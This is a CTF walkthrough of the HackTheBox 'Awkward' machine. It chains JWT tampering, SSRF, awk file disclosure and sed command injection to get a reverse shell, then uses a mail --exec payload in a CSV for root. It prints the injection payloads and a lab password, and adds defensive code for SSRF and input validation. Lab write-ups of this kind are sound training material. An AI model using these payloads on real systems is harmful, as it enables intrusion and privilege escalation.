Awkward
In this article I'm going to be tackling Awkward, a medium difficulty Linux machine on hackthebox.com.
In this machine we will be presented with Vue.js files loaded with the page, where we will search for routes and exploit a malformed JWT token to bypass authentication and get access to the HR dashboard. We then exploit an SSRF to leak internal server resources, where we will find API documentation on port 3002. Using this API we will exploit awk to get command injection and extract a user's SSH credentials to gain an initial foothold. From there we exploit a sed command to get command injection and pivot to the www-data user, which has access to a file that we will abuse through the mail command to get root privileges.
As always, start with an nmap scan.
In the nmap output we see that only 2 ports are open: SSH on port 22 and HTTP on port 80, which is running an nginx server.
Let's take a look at the website running on port 80. It redirects us to http://hat-valley.htb, so let's add this hostname to the /etc/hosts file so we can access the website.
Now you should be able to access the website.
Using Wappalyzer we can see that it's a Node.js application behind Ubuntu's nginx server.
If we navigate the website we can see that an online store is under construction, so let's fuzz the website for subdomains that may lead us to the online store.
-mc all => match all status codes
Now let's filter by size and remove all responses of size 132.
We have found the subdomain store.hat-valley.htb; let's add it to the /etc/hosts file so we can view the website.
The subdomain wants us to log in.
The application uses PHP, since it responds normally to /index.php.
Enumerating directories on the root of the website.
Enumerating directories on the store subdomain.
It seems that enumerating directories doesn't bring anything of value, so let's try enumerating the website's frontend files. If we inspect the page we will find a bunch of files; let's dig in and find out if there is something of interest.
This is a Vue application (Vue is a JavaScript frontend framework).
Let's test those routes. We can notice that the /leave and /dashboard routes redirect us to the /hr route, so logging in is mandatory to access the other routes.
Let's look for other Vue files; maybe we can find other routes. If we look at the directory called services we have 4 JS files. Let's dig into these files and extract any useful information. Across all those files we get these routes:
/api/all-leave (returns jwt malformed)
/api/submit-leave
/api/login
/api/staff-details (returns jwt malformed)
/api/store-status
Since it throws the error "JWT token malformed", I think it is a token error, so let's try the request without a token. Intercept the request using Burp and we can see a token with the value guest; let's remove it and send the request, and we get "invalid user".
Doing the same with /api/staff-details, we get a list of users' data.
Exfiltrating data from the /api/staff-details route in a nice format using curl and jq.
So we have passwords hashed with some algorithm. We're going to use the website https://hashes.com/en/tools/hash_identifier to identify the type of the hashes, and looking at the result we can see that the hash is SHA256. Alternatively, use the hash-identifier command on Linux.
Now let's crack the hashes. Before using hashcat or John the Ripper, let's first try CrackStation.
Now let's log in using those credentials on the /hr route that we found previously.
Let's intercept this using Burp Suite.
%22http:%2F%2Fstore.hat-valley.htb%22 => URL-decoded: "http://store.hat-valley.htb"
We are escaping the " characters because ffuf strips them if they are not escaped.
-fs 0 => filter by size, removing empty responses
Let's take a look at the internal port 3002. Open it in the browser and take a deeper look: this is the internal API documentation for all the routes we found previously.
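The /api/store-status route fetches whatever URL it is given, which is how the internal port 3002 was reached. As an added example (not the box's own handler), this is the allowlist check such a route should apply before fetching; the allowed host and ports are assumptions for illustration:

```javascript
// Added example, not the box's /api/store-status handler: an allowlist for the URL the
// route fetches, so the server can only reach the public store host and never
// localhost, an internal port such as 3002, or a non-HTTP scheme.
const ALLOWED_HOSTS = new Set(['store.hat-valley.htb']); // assumed allowlist
const ALLOWED_PORTS = new Set(['', '80', '443']);        // '' = scheme default port

// Returns { ok: true, url } for a fetchable URL, or { ok: false, reason } to log and refuse.
function checkStoreUrl(raw) {
  let u;
  try { u = new URL(String(raw)); } catch { return { ok: false, reason: 'unparseable' }; }
  if (u.protocol !== 'http:' && u.protocol !== 'https:') return { ok: false, reason: 'scheme' };
  // "http://store.hat-valley.htb@127.0.0.1/" parses with the real host in u.hostname,
  // but any userinfo at all is a sign of a crafted URL, so refuse it outright.
  if (u.username || u.password) return { ok: false, reason: 'userinfo' };
  if (!ALLOWED_HOSTS.has(u.hostname.toLowerCase())) return { ok: false, reason: 'host' };
  if (!ALLOWED_PORTS.has(u.port)) return { ok: false, reason: 'port' };
  return { ok: true, url: u.toString() };
}
```

Logging the reason on every refusal gives a simple detection signal for SSRF probing. A name allowlist does not help if the allowed name itself resolves to an internal address, so resolve and check the IP as well when the host is not under your control.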
The /api/login route is not vulnerable.
I will show you how the syntax awk '\{user}\' /var/www/private/leave_request.csv can get you a file disclosure vulnerability: if we find a way to poison the user value (the token username) we could get file disclosure.
Copy the user token value from Storage -> Cookies -> http://hat-valley.htb and then navigate to the jwt.io website to decode the token.
In order to poison the token we need to make sure that the signature is valid, and to do that we need to crack the JWT secret.
Cracking the JWT using hashcat.
And now our token has a verified signature.
So we can notice that PWD=/var/www/hat-valley.htb, and since the application is a Node.js application there must be a package.json file, so let's leak this file.
Now we know the path to the server.js file; let's leak this file.
Disclosing the nginx configuration file for the store subdomain (nginx site configuration files are stored in /etc/nginx/sites-available/*.conf).
What this does: on the store subdomain, requests to /cart or /product-details return 403 (Forbidden), and requests ending with .php require a password, which is stored in /etc/nginx/conf.d/.htpasswd.
Let's identify the hash type using hash-identifier.
Now let's try to crack it using hashcat, but it couldn't crack it.
Let's move on and look for the users whose shell is /bin/bash.
Let's take a look at the .bashrc file of the user bean (I couldn't disclose the same file for other users). Analyzing the file we can notice an alias that backs up the user bean's home, and this seems interesting.
Let's take a look at the backup_home bash script.
Let's extract bean_backup_final.tar.gz from the victim machine. To do that we need to modify the Python script to read the content of the compressed backup as bytes and save it to a file, so we can decompress it without errors.
Now let's run the Python script and extract the compressed gzip data.
Extracting the archive using tar, and we have the user bean's backed-up home directory.
Let's see if there are any hidden directories.
Discovering bean's credentials in his xpad directory: change directory to .config/xpad and read the content-DS1ZS1 file, which contains some of bean's credentials.
Let's try to SSH using those credentials, and we are in. Cool.
We have found our first flag.
Let's check whether the password we found in .config/xpad, 014mrbeanrules!#P, is also the password for the store: the username is admin and the password may be 014mrbeanrules!#P, and we are in.
Now let's move to the directory where the store files are located.
After reading the code in the files I found 3 dangerous system calls in the cart_actions.php file where we may get command execution, but if we look at the code we will find that there is a blacklist on special characters, so it's not possible to get command execution from the first 2 system calls; the last one, using sed, we may be able to exploit.
Let's understand how sed can be exploited to inject commands: here we have replaced the first line with the command id, so we can inject in the {$item_id} field.
Let's see where add item is in the code.
Now let's go to the shop in the store web application (store.hat-valley.htb), add some item to the cart and intercept this request using Burp.
Now we will modify the item parameter and the action parameter: the item value will carry the injected commands and action will be delete_item so that sed is called. If we execute this we sleep for 3 seconds.
Generate a reverse shell script and put it in the tmp directory.
Start a listener.
add_item first and then delete_item with item set to 1/d'+-e+"1e+/tmp/reverseshell.sh"+' to execute the reverse shell.
Upgrading simple shells to fully interactive TTYs.
Listing processes, and this looks interesting: it looks like something is monitoring the leave_requests.csv file.
Let's take a look at the leave_requests.csv file.
Let's use pspy to monitor Linux processes without root privileges. You can download it from this GitHub repository https://github.com/DominicBreuker/pspy and then transfer it to the www-data session so we can use it there.
When we update the leave_requests.csv file it invokes a new process called mail, which runs with root privileges, and based on what we get from pspy we can see the mail command format that runs in the notify.sh script, so the schema of the mail command could be this: mail -s "Leave Request: " $name christine
To exploit the mail command, go to GTFOBins and search for mail to see how mail can be abused to execute scripts: echo 'bean --exec="\!/tmp/reverseshell.sh"' >> leave_requests.csv
Before you execute this, make sure you have set up a listener to catch the reverse shell.
We have successfully executed the reverse shell script using the mail command and we have spawned a root shell.
And here is the root flag.
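The root shell came from a privileged script trusting a file that the web user can write: the unquoted $name in notify.sh lets a name field turn into extra mail arguments. The shell-side fix is quoting "$name" and ending options with "--"; as an added example (not the box's /api/submit-leave handler), this is the validation the web side should apply before a request is appended to leave_requests.csv. The column set and date format are assumptions:

```javascript
// Added example, not the box's /api/submit-leave handler. The root-owned notify.sh on
// this box runs `mail -s "Leave Request: " $name christine` with $name unquoted, so a
// name field containing "--exec=..." is split into extra argv entries for mail. This
// validator is the defence at the point where the field enters leave_requests.csv.
const NAME_RE = /^[A-Za-z][A-Za-z' -]{0,63}$/;      // letters, spaces, apostrophes, hyphens
const DATE_RE = /^\d{4}-\d{2}-\d{2}$/;             // assumed: ISO dates in the CSV
const REASON_RE = /^[A-Za-z0-9 .,!?'-]{1,200}$/;   // no ", ;, $, backtick or newline

// A value that the shell would split into a word starting with '-' is parsed by mail
// as an option; refuse it even when every character on its own looks harmless.
function looksLikeOption(field) {
  return field.split(/\s+/).some((w) => w.startsWith('-'));
}

// Returns { ok, errors } for a submitted leave request; the column set is assumed.
function validateLeaveRequest(req) {
  const errors = [];
  const name = String(req.name ?? '').trim();
  if (!NAME_RE.test(name)) errors.push('name');
  if (looksLikeOption(name)) errors.push('name-option');
  for (const f of ['start', 'end']) if (!DATE_RE.test(String(req[f] ?? ''))) errors.push(f);
  if (!REASON_RE.test(String(req.reason ?? ''))) errors.push('reason');
  return { ok: errors.length === 0, errors };
}

// Build the CSV line only from validated input. The regexes already exclude commas,
// quotes and newlines, so a plain join cannot shift columns for the privileged consumer.
function toCsvRow(req) {
  const v = validateLeaveRequest(req);
  if (!v.ok) throw new Error('invalid leave request: ' + v.errors.join(','));
  return [String(req.name).trim(), req.start, req.end, req.reason].join(',') + '\n';
}
```

Validation on the writer is defence in depth only: a file that root reads must not be writable by www-data in the first place, and the consumer must still quote its arguments.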
Hope you found this walkthrough easy to understand and follow.
Greetings from Sayonara